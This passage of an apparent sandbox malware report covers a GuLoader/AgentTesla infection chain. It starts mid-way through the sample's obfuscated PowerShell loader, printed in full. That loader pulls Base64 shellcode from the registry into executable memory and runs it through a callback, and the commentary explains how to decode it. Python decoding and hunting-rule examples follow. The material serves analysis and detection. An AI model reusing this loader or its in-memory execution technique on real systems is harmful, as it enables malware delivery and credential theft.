PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKllHaaUptNa)Co;La[BaDHelNelUnIDimRapChoGrrGetTi(mi`"""cogRadPaiTe3Ba2Ho`"""Un)no]OppSwuWhbXelRuikucBi UnsMatFraJotSoiIscAs SoeWoxPitSyeKvrSenSt DiisanEptDa PaGAfeMbtFlCHylAfiSaptaRCagEnnKa(koiBenPatCa KaRSeuEklEnaYa,PsiSknWatMi BlLNiiKnkInvLa1Bl0Fo4Ru)Sy;Ra[AlDArlAblPrILimBepdeotirSetJa(pa`"""BauPasEdeSkrps3me2Gi`"""De)In]UdpInuBlbuolUniTmcUn FrsVitStaChtNoiBucAn AneTaxEttIneobrTanHj EtiArnSktSn KaGsueChtSnCOpllaiCaeSonNitBuRPaeClcUntUd(DeiCanAstEp UpdSaeGoslu,MiiUmnFotHe WiCMoeAcnGe)Fu;St[EnDFolNdlfrIramZopSkoPlrNitRe(Fu`"""SjkDyeTrrAnnOpePulAc3Un2su`"""Da)Am]RapopuTobFolDaiDrcAu AbsSptBiaCetFuiEncPa PseClxFetSeeMirSynTo GlISunCrtSpPdetPerUn PaESenFauDomAfSUnybasAdtbreUdmDiLStoFacReaGalTreSwsAmWKr(ScuKaiAdnLitUn StvKa1Al,DeiFrnsytTr 
OovGo2pl)re;ca}bl'Sa;An`$seSretLauKreMeoGarOpgbolKoeKorHusDr3Al=Sr[TrSRetDiuAneRooGrrSkgFolHeePorApsHa1Bl]In:Fl:MoVSniSarSetCaunoaSalAkATrlAvlKjoMucPe(Ne0no,Sc1Li0Bo4Co8Sp5ab7Th6Tr,Ko1Ud2Ka2Ag8Se8ba,Ch6Zo4Ja)Fo;Dr`$AfmKauGitJeaRitPaiMaoFanBniofsPetPa=Va(SeGPeemotAu-TiILhtSheFemOvPRerHjoStpFleFerHatUnyfe Pl-GuPOuaTjtAphMa Su'ErHUnKSuCMeUCh:Rn\SpNSueStcChrchoInlPeoTeggsiDecSnaAplWi\NaIDagAsnAdoForAreprrOviPenClgDieBerFasUm'Up)An.paSAckChiKlfSernyePrtSt;Pr`$EckUlrTaaUnkUnnRoiBonSggAweSurSmsAf Gl=Pi Rh[OkSAsyFoshytUneChmKo.ToCChoDanAnvMeebarHytVe]Ch:Th:BeFAfrCloMimDeBEnaUdsCieCo6Fo4OtSDitSerSuiAunSugMi(Fa`$EfmSouOvtUdaFitDeiReoMenRiiDosLotor)Re;Sp[FlSGuyUdstatFoeStmMe.WiRSkuDinUntAliMamTieUn.CiIUdnMetskeOvrKooSnpFiSDyeDirCrvMaiFrcFoeInsAl.SyMBeaTeransWrhkoaDelWi]Un:De:SkCAroStpSpyUn(Dr`$UlkCorToaOukFanHeiNonBlgCheSerFasLi,Mi Fl0He,Pa En Pu`$PoSPatDeuKaeBioPurVrgRulSkeOvrIwsIn3ie,To Sk`$MlkRerStaMekFrnRoiConAngSteOprOvsSa.SncCaodeuRanKrtPr)Un;Is[NeSMetebuBeePeoUnrSagOllUdeInrSasSo1Pr]Pe:Pa:SiEKanpiuUkmOpSTyySvsBrtcoeKrmHaLWeoAicLaaKrlWieMiswoWLn(Ba`$SpSDetSpuMaePaoNurUtgInlSaehyrEnsHj3Sc,Bi Kn0Me)Fo#Sk;""";Function Stueorglers4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $discontentment = $discontentment + $HS.Substring($i, 1); } $discontentment;}$Sudser0 = Stueorglers4 'riISyEScXFr ';$Sudser1= Stueorglers4 $Skoleeksempel;&$Sudser0 $Sudser1;;
                Imagebase:0xe60000
                File size:430592 bytes
                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high
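
The PowerShell stage above (Target ID 3) hides its real script in $Skoleeksempel and recovers it with Stueorglers4, which keeps every third character starting at offset 2 (For($i=2; $i -lt $HS.Length-1; $i+=(2+1))) and hands the result to $Sudser0, which itself decodes to IEX. Decoding the full string on this page with that routine gives an Add-Type block importing, among others, VirtualAlloc and EnumSystemLocalesW from kernel32, followed by code that reads a Base64 blob from the registry value Skifret under HKCU:\Necrological\Ignoreringers, decodes it with [System.Convert]::FromBase64String, copies it with Marshal::Copy into a buffer obtained from VirtualAlloc(0, 1048576, 12288, 64) (1 MiB, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) and passes that buffer to EnumSystemLocalesW as the enumeration callback, so the shellcode runs without a direct call from script. The Python below is an added example, not code from the report or the sample: it ports the decoder (including its loop bound, which drops a character sitting at the last index), runs it on fragments copied from the command line, and adds a brute-force stride recovery for cases where the decoder function is not readable; the keyword list it scores against is an assumption.

```python
"""Stride decoder for the PowerShell stage's string obfuscation.

Added example: not code from the report or the sample. Stueorglers4 in the
command line above keeps every third character of its argument starting at
offset 2 and returns the result, which is then run through IEX (the decoded
form of $Sudser0). Fragments below are copied from that command line; the
keyword list used for stride recovery is an assumption.
"""

# Copied from the command line above: first 117 characters of $Skoleeksempel.
SKOLEEKSEMPEL_PREFIX = (
    "SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPri"
    "Foopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;"
)
# Copied from the same command line: the argument that becomes $Sudser0.
SUDSER0_ARG = "riISyEScXFr "
# Copied from later in $Skoleeksempel: the VirtualAlloc call.
VIRTUALALLOC_FRAGMENT = (
    "MoVSniSarSetCaunoaSalAkATrlAvlKjoMucPe(Ne0no,Sc1Li0Bo4Co8Sp5ab7Th6Tr,"
    "Ko1Ud2Ka2Ag8Se8ba,Ch6Zo4Ja)Fo;"
)


def stueorglers4(hs: str) -> str:
    """Faithful port of the sample's decoder:
        For($i=2; $i -lt $HS.Length-1; $i+=(2+1)) { ... $HS.Substring($i, 1) }
    The bound is Length-1, so a payload character sitting at the last index
    (any input whose length is a multiple of 3) is silently dropped; the
    sample tolerates this because its script ends in a '#' comment."""
    return "".join(hs[i] for i in range(2, len(hs) - 1, 3))


def decode_stride(text: str, start: int, step: int) -> str:
    """General stride decoder without the off-by-one, for manual analysis."""
    return text[start::step]


# Assumed scoring vocabulary: tokens a decoded stage of this kind is expected
# to contain (P/Invoke boilerplate plus the calls seen in this sample).
KEYWORDS = ("Add-Type", "DllImport", "using System", "VirtualAlloc",
            "FromBase64String", "Marshal", "Get-ItemProperty", "public static")


def recover_stride(text: str, max_step: int = 8):
    """Brute-force (start, step) when the decoder itself is not readable:
    try every stride up to max_step, score the decoded text by keyword
    hits and return the best pair, or None when nothing scores."""
    best, best_score = None, 0
    for step in range(2, max_step + 1):
        for start in range(step):
            decoded = decode_stride(text, start, step)
            score = sum(decoded.count(k) for k in KEYWORDS)
            if score > best_score:
                best, best_score = (start, step), score
    return best


if __name__ == "__main__":
    print(stueorglers4(SUDSER0_ARG))             # IEX
    print(stueorglers4(SKOLEEKSEMPEL_PREFIX))    # Add-Type -TypeDefinition 'using System
    print(stueorglers4(VIRTUALALLOC_FRAGMENT))   # VirtualAlloc(0,1048576,12288,64)
    print(recover_stride(SKOLEEKSEMPEL_PREFIX))  # (2, 3)
```

To recover the whole stage, paste the complete $Skoleeksempel value into stueorglers4; the junk characters are arbitrary two-letter fillers, so the brute-force scorer is only needed when the decoder function has been renamed or its constants hidden, which this sample does not do.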

                Target ID:4
                Start time:14:50:18
                Start date:28/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6edaf0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:13
                Start time:14:51:20
                Start date:28/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
                Imagebase:0x890000
                File size:2170976 bytes
                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:moderate

                Target ID:14
                Start time:14:51:21
                Start date:28/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
                Imagebase:0xbd0000
                File size:43176 bytes
                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:17
                Start time:14:52:17
                Start date:28/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                Imagebase:0xb40000
                File size:106496 bytes
                MD5 hash:827875A7EE6003FC7F5301C613A2BB1C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
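
Three of the process records above are worth turning into hunting logic even without the process tree: the script host opens a file whose name ends in " pdf.vbs" (a document-lookalike lure), csc.exe and cvtres.exe are driven by response and resource files under the user's AppData\Local\Temp (the page's Sigma hit "Dot net compiler compiles file from suspicious location"), and CasPol.exe under Framework\v2.0.50727 starts with no arguments and is the process in which the AgentTesla and GuLoader Yara rules later match in memory. The Python below is an added example, not code from the report or from the Sigma rule: it evaluates three such checks over records constructed from the command lines shown here; the user-writable path list, the lure-extension list and the "CasPol.exe without arguments" heuristic are assumptions. The PowerShell record is left out because its command line is too long to embed.

```python
"""Hunting checks over the process records above.

Added example, not code from the report or from the Sigma rule it cites.
PROCESSES is constructed from the command lines shown on this page (the
PowerShell record is omitted because its command line is too long to embed).
The user-writable path list, the lure extension list and the "CasPol.exe
without arguments" heuristic are assumptions.
"""
import re
from typing import Callable, Dict, List, Tuple

PROCESSES: List[Dict[str, object]] = [
    {"id": 0, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"'},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"CMD.EXE /c echo C:\Windows"},
    {"id": 2, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"id": 13, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline'},
    {"id": 14, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"'},
    {"id": 17, "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"},
]

# Assumed approximation of "suspicious location": user-writable directories.
USER_WRITABLE = re.compile(r"\\(?:AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)
# Assumed lure pattern: a document-like token right before a script extension.
DOC_LURE = re.compile(r'[ ._-](?:pdf|doc|docx|xls|xlsx|jpg|png)\.(?:vbs|vbe|js|jse|wsf|hta)"?\s*$', re.I)


def image_name(p: Dict[str, object]) -> str:
    return str(p["image"]).rsplit("\\", 1)[-1].lower()


def dotnet_compile_from_user_writable(p: Dict[str, object]) -> bool:
    """csc/vbc/cvtres reading inputs or writing outputs under a user-writable path."""
    return image_name(p) in {"csc.exe", "vbc.exe", "cvtres.exe"} and \
        bool(USER_WRITABLE.search(str(p["cmdline"])))


def caspol_without_args(p: Dict[str, object]) -> bool:
    """CasPol.exe prints its usage and exits when given no arguments, so an
    instance with an empty argument list that stays alive (and, here, ends
    up holding AgentTesla in memory) is a likely injection host."""
    if image_name(p) != "caspol.exe":
        return False
    rest = re.sub(r'^"?[^"]*?caspol\.exe"?', "", str(p["cmdline"]), flags=re.I)
    return rest.strip() == ""


def script_host_document_lure(p: Dict[str, object]) -> bool:
    return image_name(p) in {"wscript.exe", "cscript.exe"} and \
        bool(DOC_LURE.search(str(p["cmdline"])))


RULES: Dict[str, Callable[[Dict[str, object]], bool]] = {
    "script_host_document_lure": script_host_document_lure,
    "dotnet_compile_from_user_writable": dotnet_compile_from_user_writable,
    "caspol_without_args": caspol_without_args,
}


def evaluate(processes: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Return (target id, rule name) for every record that trips a rule."""
    return sorted((int(p["id"]), name)
                  for p in processes for name, rule in RULES.items() if rule(p))


if __name__ == "__main__":
    for target_id, rule in evaluate(PROCESSES):
        print(f"Target ID {target_id}: {rule}")
```

The compile rule fires twice here (csc.exe and cvtres.exe) because both legs of a PowerShell Add-Type compilation touch the same temporary directory; correlating the two on the directory name (i3ontxzb above) is the cheapest way to collapse them into one alert.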

                No disassembly